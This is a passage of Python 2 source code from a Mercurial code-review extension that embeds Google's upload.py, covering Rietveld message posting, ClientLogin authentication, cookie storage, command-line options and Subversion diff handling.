    ctype, body = EncodeMultipartFormData(form_fields.items(), [])
    response = MySend("/" + issue + "/edit", body, content_type=ctype)
    if response != "":
        print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
        sys.exit(2)
def PostMessage1(issue, message, reviewers=None, cc=None, send_mail=None, subject=None):
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail is not None:
form_fields['send_mail'] = send_mail
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1'
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
def PostMessage(issue, message, reviewers=None, cc=None, send_mail=None, subject=None):
	"""Post a message to the issue, retrying once on failure.

	When Rietveld is busy, it seems to throw off a lot of HTTP Error 500:
	Internal Server Error.  Rather than abort, sleep and try again.
	Even if the second time fails, let the overall hg command keep going.
	"""
	# Local import: the sleep lived in the (nonexistent) os.sleep before.
	import time
	try:
		PostMessage1(issue, message, reviewers, cc, send_mail, subject)
		return
	except Exception:
		pass
	ui.warn("error posting to "+server+" log; sleep 2 and try again.")
	# BUG FIX: was os.sleep(2); the os module has no sleep(), so the retry
	# path raised AttributeError instead of retrying.
	time.sleep(2)
	try:
		PostMessage1(issue, message, reviewers, cc, send_mail, subject)
		return
	except Exception:
		pass
	ui.warn("error posting to "+server+" twice; log not updated.")
# Bare attribute bag: RietveldSetup fills in an instance of this to mimic
# the parsed-options object that the embedded upload.py code expects.
class opt(object):
	pass
def RietveldSetup(ui, repo):
	"""Initialize module-global Rietveld state from the Mercurial config."""
	global upload_options, rpc, server, server_url_base, force_google_account, verbosity
	# TODO(rsc): If the repository config has no codereview section,
	# do not enable the extension. This allows users to
	# put the extension in their global .hgrc but only
	# enable it for some repositories.
	# if not ui.has_section("codereview"):
	# 	cmdtable = {}
	# 	return
	if not ui.verbose:
		verbosity = 0
	# Config options.
	x = ui.config("codereview", "server")
	if x is not None:
		server = x
	# TODO(rsc): Take from ui.username?
	email = None
	x = ui.config("codereview", "email")
	if x is not None:
		email = x
	cc = None
	x = ui.config("codereview", "cc")
	if x is not None:
		cc = x
	server_url_base = "http://" + server + "/"
	testing = ui.config("codereview", "testing")
	force_google_account = ui.configbool("codereview", "force_google_account", False)
	# upload_options mirrors the parsed-options object the embedded
	# upload.py code below expects; `opt` is just an attribute bag.
	upload_options = opt()
	upload_options.email = email
	upload_options.host = None
	upload_options.verbose = 0
	upload_options.description = None
	upload_options.description_file = None
	upload_options.reviewers = None
	upload_options.cc = cc
	upload_options.message = None
	upload_options.issue = None
	upload_options.download_base = False
	upload_options.revision = None
	upload_options.send_mail = False
	upload_options.vcs = None
	upload_options.server = server
	upload_options.save_cookies = True
	# Test mode: fixed identity, no on-disk cookie jar.
	if testing:
		upload_options.save_cookies = False
		upload_options.email = "test@example.com"
	rpc = None
#######################################################################
# We keep a full copy of upload.py here to avoid import path hell.
# It would be nice if hg added the hg repository root
# to the default PYTHONPATH.
# Edit .+2,<hget http://codereview.appspot.com/static/upload.py
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
#  0: Errors only.
#  1: Status messages.
#  2: Info logs.
#  3: Debug logs.
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# Constants for version control names. Used by GuessVCSName.
VCS_GIT = "Git"
VCS_MERCURIAL = "Mercurial"
VCS_SUBVERSION = "Subversion"
VCS_UNKNOWN = "Unknown"
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = ['application/javascript', 'application/x-javascript',
                  'application/x-freemind']
# Map of lowercase/abbreviated VCS names to the canonical names above.
VCS_ABBREVIATIONS = {
  VCS_MERCURIAL.lower(): VCS_MERCURIAL,
  "hg": VCS_MERCURIAL,
  VCS_SUBVERSION.lower(): VCS_SUBVERSION,
  "svn": VCS_SUBVERSION,
  VCS_GIT.lower(): VCS_GIT,
}
def GetEmail(prompt):
  """Prompts the user for their email address and returns it.
  The last used email address is saved to a file and offered up as a suggestion
  to the user. If the user presses enter without typing in anything the last
  used email address is used. If the user enters a new address, it is saved
  for next time we prompt.
  """
  last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
  last_email = ""
  if os.path.exists(last_email_file_name):
    try:
      # "with" closes the file even if readline() raises; the previous
      # version leaked the handle on error.
      with open(last_email_file_name, "r") as last_email_file:
        last_email = last_email_file.readline().strip("\n")
      prompt += " [%s]" % last_email
    except IOError:
      pass
  email = raw_input(prompt + ": ").strip()
  if email:
    try:
      with open(last_email_file_name, "w") as last_email_file:
        last_email_file.write(email)
    except IOError:
      # Best effort only; failing to remember the address is harmless.
      pass
  else:
    email = last_email
  return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
  """Write an error message to stderr and abort with exit status 1."""
  sys.stderr.write("%s\n" % (msg,))
  sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
  """Raised to indicate there was an error authenticating with ClientLogin."""
  def __init__(self, url, code, msg, headers, args):
    # args is the parsed key=value response body from ClientLogin; its
    # "Error" entry carries the failure code (e.g. "BadAuthentication",
    # "CaptchaRequired" — see the checks in _Authenticate).
    urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
    self.args = args
    self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={},
save_cookies=False):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
"""
self.host = host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = "GOOGLE"
if self.host.endswith(".google.com") and not force_google_account:
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=")
for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg,
e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("http://%s/_ah/login?%s" %
(self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg,
response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, ("The user's access to the service has been "
"disabled.")
break
if e.reason == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
  """Provides a simplified RPC-style interface for HTTP requests."""
  def _Authenticate(self):
    """Save the cookie jar after authentication."""
    super(HttpRpcServer, self)._Authenticate()
    if self.save_cookies:
      StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
      self.cookie_jar.save()
  def _GetOpener(self):
    """Returns an OpenerDirector that supports cookies and ignores redirects.
    Returns:
      A urllib2.OpenerDirector object.
    """
    # Build the opener by hand, deliberately without an HTTPRedirectHandler,
    # so the 302 from /_ah/login is seen by _GetAuthCookie rather than
    # being followed automatically.
    opener = urllib2.OpenerDirector()
    opener.add_handler(urllib2.ProxyHandler())
    opener.add_handler(urllib2.UnknownHandler())
    opener.add_handler(urllib2.HTTPHandler())
    opener.add_handler(urllib2.HTTPDefaultErrorHandler())
    opener.add_handler(urllib2.HTTPSHandler())
    opener.add_handler(urllib2.HTTPErrorProcessor())
    if self.save_cookies:
      # Cookie file is per-server; `server` is the module-level host name.
      self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
      self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
      if os.path.exists(self.cookie_file):
        try:
          self.cookie_jar.load()
          self.authenticated = True
          StatusUpdate("Loaded authentication cookies from %s" %
                       self.cookie_file)
        except (cookielib.LoadError, IOError):
          # Failed to load cookies - just ignore them.
          pass
      else:
        # Create an empty cookie file with mode 600
        fd = os.open(self.cookie_file, os.O_CREAT, 0600)
        os.close(fd)
      # Always chmod the cookie file
      os.chmod(self.cookie_file, 0600)
    else:
      # Don't save cookies across runs of update.py.
      self.cookie_jar = cookielib.CookieJar()
    opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
    return opener
# Command-line option definitions for running upload.py standalone.
parser = optparse.OptionParser(usage="%prog [options] [-- diff_options]")
parser.add_option("-y", "--assume_yes", action="store_true",
                  dest="assume_yes", default=False,
                  help="Assume that the answer to yes/no questions is 'yes'.")
# Logging
group = parser.add_option_group("Logging options")
group.add_option("-q", "--quiet", action="store_const", const=0,
                 dest="verbose", help="Print errors only.")
group.add_option("-v", "--verbose", action="store_const", const=2,
                 dest="verbose", default=1,
                 help="Print info level logs (default).")
group.add_option("--noisy", action="store_const", const=3,
                 dest="verbose", help="Print all logs.")
# Review server
group = parser.add_option_group("Review server options")
group.add_option("-s", "--server", action="store", dest="server",
                 default="codereview.appspot.com",
                 metavar="SERVER",
                 help=("The server to upload to. The format is host[:port]. "
                       "Defaults to '%default'."))
group.add_option("-e", "--email", action="store", dest="email",
                 metavar="EMAIL", default=None,
                 help="The username to use. Will prompt if omitted.")
group.add_option("-H", "--host", action="store", dest="host",
                 metavar="HOST", default=None,
                 help="Overrides the Host header sent with all RPCs.")
group.add_option("--no_cookies", action="store_false",
                 dest="save_cookies", default=True,
                 help="Do not save authentication cookies to local disk.")
# Issue
group = parser.add_option_group("Issue options")
group.add_option("-d", "--description", action="store", dest="description",
                 metavar="DESCRIPTION", default=None,
                 help="Optional description when creating an issue.")
group.add_option("-f", "--description_file", action="store",
                 dest="description_file", metavar="DESCRIPTION_FILE",
                 default=None,
                 help="Optional path of a file that contains "
                      "the description when creating an issue.")
group.add_option("-r", "--reviewers", action="store", dest="reviewers",
                 metavar="REVIEWERS", default=None,
                 help="Add reviewers (comma separated email addresses).")
group.add_option("--cc", action="store", dest="cc",
                 metavar="CC", default=None,
                 help="Add CC (comma separated email addresses).")
group.add_option("--private", action="store_true", dest="private",
                 default=False,
                 help="Make the issue restricted to reviewers and those CCed")
# Upload options
group = parser.add_option_group("Patch options")
group.add_option("-m", "--message", action="store", dest="message",
                 metavar="MESSAGE", default=None,
                 help="A message to identify the patch. "
                      "Will prompt if omitted.")
group.add_option("-i", "--issue", type="int", action="store",
                 metavar="ISSUE", default=None,
                 help="Issue number to which to add. Defaults to new issue.")
group.add_option("--download_base", action="store_true",
                 dest="download_base", default=False,
                 help="Base files will be downloaded by the server "
                      "(side-by-side diffs may not work on files with CRs).")
group.add_option("--rev", action="store", dest="revision",
                 metavar="REV", default=None,
                 help="Branch/tree/revision to diff against (used by DVCS).")
group.add_option("--send_mail", action="store_true",
                 dest="send_mail", default=False,
                 help="Send notification email to reviewers.")
group.add_option("--vcs", action="store", dest="vcs",
                 metavar="VCS", default=None,
                 help=("Version control system (optional, usually upload.py "
                       "already guesses the right VCS)."))
def GetRpcServer(options):
  """Build the HTTP RPC server used for Rietveld requests.
  Returns:
    A new AbstractRpcServer, on which RPC calls can be made.
  """
  def PromptForCredentials():
    """Ask the user for a username and password."""
    address = options.email
    if address is None:
      address = GetEmail("Email (login for uploading to %s)" % options.server)
    secret = getpass.getpass("Password for %s: " % address)
    return (address, secret)
  host = (options.host or options.server).lower()
  if host != "localhost" and not host.startswith("localhost:"):
    # Normal case: real server, real ClientLogin authentication.
    return HttpRpcServer(options.server, PromptForCredentials,
                         host_override=options.host,
                         save_cookies=options.save_cookies)
  # This is the dev_appserver: use fake authentication.
  email = options.email
  if email is None:
    email = "test@example.com"
  logging.info("Using debug user %s. Override with --email" % email)
  server = HttpRpcServer(
      options.server,
      lambda: (email, "password"),
      host_override=options.host,
      extra_headers={"Cookie":
                     'dev_appserver_login="%s:False"' % email},
      save_cookies=options.save_cookies)
  # Don't try to talk to ClientLogin.
  server.authenticated = True
  return server
def EncodeMultipartFormData(fields, files):
  """Encode form fields for multipart/form-data.
  Args:
    fields: A sequence of (name, value) elements for regular form fields.
    files: A sequence of (name, filename, value) elements for data to be
           uploaded as files.
  Returns:
    (content_type, body) ready for httplib.HTTP instance.
  Source:
    http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
  """
  BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
  CRLF = '\r\n'
  parts = []
  for (name, payload) in fields:
    if type(payload) == unicode:
      payload = payload.encode("utf-8")
    parts.extend(['--' + BOUNDARY,
                  'Content-Disposition: form-data; name="%s"' % name,
                  '',
                  payload])
  for (name, fname, payload) in files:
    if type(fname) == unicode:
      fname = fname.encode("utf-8")
    if type(payload) == unicode:
      payload = payload.encode("utf-8")
    parts.extend(['--' + BOUNDARY,
                  'Content-Disposition: form-data; name="%s"; filename="%s"' %
                  (name, fname),
                  'Content-Type: %s' % GetContentType(fname),
                  '',
                  payload])
  parts.append('--' + BOUNDARY + '--')
  parts.append('')
  body = CRLF.join(parts)
  content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
  return content_type, body
def GetContentType(filename):
  """Guess a MIME type from filename; default to application/octet-stream."""
  guessed, _ = mimetypes.guess_type(filename)
  if guessed:
    return guessed
  return 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
# (On other platforms subprocess is invoked without a shell.)
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
                           universal_newlines=True,
                           env=os.environ):
  """Executes a command and returns the output from stdout and the return code.
  Args:
    command: Command to execute.
    print_output: If True, the output is printed to stdout.
                  If False, both stdout and stderr are ignored.
    universal_newlines: Use universal_newlines flag (default: True).
  Returns:
    Tuple (output, return code)
  """
  logging.info("Running %s", command)
  proc = subprocess.Popen(command, stdout=subprocess.PIPE,
                          stderr=subprocess.PIPE, shell=use_shell,
                          universal_newlines=universal_newlines, env=env)
  if print_output:
    captured = []
    # Echo stdout line by line while also capturing it.
    for line in iter(proc.stdout.readline, ""):
      sys.stdout.write(line.strip("\n") + "\n")
      captured.append(line)
    output = "".join(captured)
  else:
    output = proc.stdout.read()
  proc.wait()
  errout = proc.stderr.read()
  if print_output and errout:
    sys.stderr.write(errout + "\n")
  proc.stdout.close()
  proc.stderr.close()
  return output, proc.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
             print_output=False, env=os.environ):
  """Run command and return its stdout; exit on failure or empty output."""
  output, exit_code = RunShellWithReturnCode(command, print_output,
                                             universal_newlines, env)
  if exit_code:
    ErrorExit("Got error status from %s:\n%s" % (command, output))
  if not silent_ok and not output:
    ErrorExit("No output from %s" % command)
  return output
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
prompt = "Are you sure to continue?(y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = filename.strip().replace('\\', '/')
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields,
[("data", filename, content)])
response_body = rpc_server.Send(url, body,
content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
if base_content != None:
UploadFile(filename, file_id, base_content, is_binary, status, True)
if new_content != None:
UploadFile(filename, file_id, new_content, is_binary, status, False)
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
class SubversionVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Subversion."""
  def __init__(self, options):
    super(SubversionVCS, self).__init__(options)
    # --rev accepts either "REV" or "REV_START:REV_END" (per the regex).
    if self.options.revision:
      match = re.match(r"(\d+)(:(\d+))?", self.options.revision)
      if not match:
        ErrorExit("Invalid Subversion revision %s." % self.options.revision)
      self.rev_start = match.group(1)
      self.rev_end = match.group(3)
    else:
      self.rev_start = self.rev_end = None
    # Cache output from "svn list -r REVNO dirname".
    # Keys: dirname, Values: 2-tuple (output for start rev and end rev).
    self.svnls_cache = {}
    # SVN base URL is required to fetch files deleted in an older revision.
    # Result is cached to not guess it over and over again in GetBaseFile().
    required = self.options.download_base or self.options.revision is not None
    self.svn_base = self._GuessBase(required)
  def GuessBase(self, required):
    """Wrapper for _GuessBase."""
    # `required` is unused here: the base URL was already computed (and
    # validated if required) in __init__ and is simply returned from cache.
    return self.svn_base
  def _GuessBase(self, required):
    """Returns the SVN base URL.
    Args:
      required: If true, exits if the url can't be guessed, otherwise None is
        returned.
    """
    info = RunShell(["svn", "info"])
    for line in info.splitlines():
      words = line.split()
      if len(words) == 2 and words[0] == "URL:":
        url = words[1]
        scheme, netloc, path, params, query, fragment = urlparse.urlparse(url)
        username, netloc = urllib.splituser(netloc)
        if username:
          logging.info("Removed username from base URL")
        # Known hosts get hand-crafted *checkout* viewer URLs; anything
        # else just gets the repository URL with a trailing slash.
        if netloc.endswith("svn.python.org"):
          if netloc == "svn.python.org":
            if path.startswith("/projects/"):
              # Drop the leading "/projects" (9 chars), keeping the slash.
              path = path[9:]
          elif netloc != "pythondev@svn.python.org":
            ErrorExit("Unrecognized Python URL: %s" % url)
          base = "http://svn.python.org/view/*checkout*%s/" % path
          logging.info("Guessed Python base = %s", base)
        elif netloc.endswith("svn.collab.net"):
          if path.startswith("/repos/"):
            # Drop the leading "/repos" (6 chars), keeping the slash.
            path = path[6:]
          base = "http://svn.collab.net/viewvc/*checkout*%s/" % path
          logging.info("Guessed CollabNet base = %s", base)
        elif netloc.endswith(".googlecode.com"):
          path = path + "/"
          base = urlparse.urlunparse(("http", netloc, path, params,
                                      query, fragment))
          logging.info("Guessed Google Code base = %s", base)
        else:
          path = path + "/"
          base = urlparse.urlunparse((scheme, netloc, path, params,
                                      query, fragment))
          logging.info("Guessed base = %s", base)
        return base
    if required:
      ErrorExit("Can't find URL in output from svn info")
    return None
def GenerateDiff(self, args):
cmd = ["svn", "diff"]
if self.options.revision:
cmd += ["-r", self.options.revision]
cmd.extend(args)
data = RunShell(cmd)
count = 0
for line in data.splitlines():
if line.startswith("Index:") or line.startswith("Property changes on:"):
count += 1
logging.info(line)
if not count:
ErrorExit("No valid patches found in output from svn diff")
return data
def _CollapseKeywords(self, content, keyword_str):
"""Collapses SVN keywords."""
# svn cat translates keywords but svn diff doesn't. As a result of this
# behavior patching.PatchChunks() fails with a chunk mismatch error.
# This part was originally written by the Review Board development team
# who had the same problem (http://reviews.review-board.org/r/276/).
# Mapping of keywords to known aliases
svn_keywords = {
# Standard keywords
'Date': ['Date', 'LastChangedDate'],
'Revision': ['Revision', 'LastChangedRevision', 'Rev'],
'Author': ['Author', 'LastChangedBy'],
'HeadURL': ['HeadURL', 'URL'],
'Id': ['Id'],
# Aliases
'LastChangedDate': ['LastChangedDate', 'Date'],
'LastChangedRevision': ['LastChangedRevision', 'Rev', 'Revision'],
'LastChangedBy': ['LastChangedBy', 'Author'],
'URL': ['URL', 'HeadURL'],
}
def repl(m):
if m.group(2):
return "$%s::%s$" % (m.group(1), " " * len(m.group(3)))
return "$%s$" % m.group(1)
keywords = [keyword
for name in keyword_str.split(" ")
for keyword in svn_keywords.get(name, [])]
return re.sub(r"\$(%s):(:?)([^\$]+)\$" % '|'.join(keywords), repl, content)
def GetUnknownFiles(self):
status = RunShell(["svn", "status", "--ignore-externals"], silent_ok=True)
unknown_files = []
for line in status.split("\n"):
if line and line[0] == "?":
unknown_files.append(line)
return unknown_files
def ReadFile(self, filename):
"""Returns the contents of a file."""
file = open(filename, 'rb')
result = ""
try:
result = file.read()
finally:
file.close()
return result
  def GetStatus(self, filename):
    """Returns the status of a file."""
    if not self.options.revision:
      # No revision range: ask "svn status" directly.
      status = RunShell(["svn", "status", "--ignore-externals", filename])
      if not status:
        ErrorExit("svn status returned no output for %s" % filename)
      status_lines = status.splitlines()
      # If file is in a cl, the output will begin with
      # "\n--- Changelist 'cl_name':\n". See
      # http://svn.collab.net/repos/svn/trunk/notes/changelist-design.txt
      if (len(status_lines) == 3 and
          not status_lines[0] and
          status_lines[1].startswith("--- Changelist")):
        status = status_lines[2]
      else:
        status = status_lines[0]
    # If we have a revision to diff against we need to run "svn list"
    # for the old and the new revision and compare the results to get
    # the correct status for a file.
    else:
      dirname, relfilename = os.path.split(filename)
      if dirname not in self.svnls_cache:
        cmd = ["svn", "list", "-r", self.rev_start, dirname or "."]
        out, returncode = RunShellWithReturnCode(cmd)
        if returncode:
          ErrorExit("Failed to get status for %s." % filename)
        old_files = out.splitlines()
        args = ["svn", "list"]
        if self.rev_end:
          args += ["-r", self.rev_end]
        cmd = args + [dirname or "."]
        out, returncode = RunShellWithReturnCode(cmd)
        if returncode:
          ErrorExit("Failed to run command %s" % cmd)
        self.svnls_cache[dirname] = (old_files, out.splitlines())
      old_files, new_files = self.svnls_cache[dirname]
      # Deleted if listed before but not after; modified if in both;
      # otherwise treated as added.
      if relfilename in old_files and relfilename not in new_files:
        status = "D "
      elif relfilename in old_files and relfilename in new_files:
        status = "M "
      else:
        status = "A "
    return status
def GetBaseFile(self, filename):
    """Fetch the base (and possibly new) content of filename from svn.

    Returns:
      A 4-tuple (base_content, new_content, is_binary, status); contents
      may be None when the server can reconstruct them from the diff.
    """
    status = self.GetStatus(filename)
    base_content = None
    new_content = None

    # If a file is copied its status will be "A +", which signifies
    # "addition-with-history". See "svn st" for more information. We need to
    # upload the original file or else diff parsing will fail if the file was
    # edited.
    if status[0] == "A" and status[3] != "+":
        # We'll need to upload the new content if we're adding a binary file
        # since diff's output won't contain it.
        mimetype = RunShell(["svn", "propget", "svn:mime-type", filename],
                            silent_ok=True)
        base_content = ""
        is_binary = bool(mimetype) and not mimetype.startswith("text/")
        if is_binary and self.IsImage(filename):
            new_content = self.ReadFile(filename)
    elif (status[0] in ("M", "D", "R") or
          (status[0] == "A" and status[3] == "+") or  # Copied file.
          (status[0] == " " and status[1] == "M")):  # Property change.
        args = []
        if self.options.revision:
            url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
        else:
            # Don't change filename, it's needed later.
            url = filename
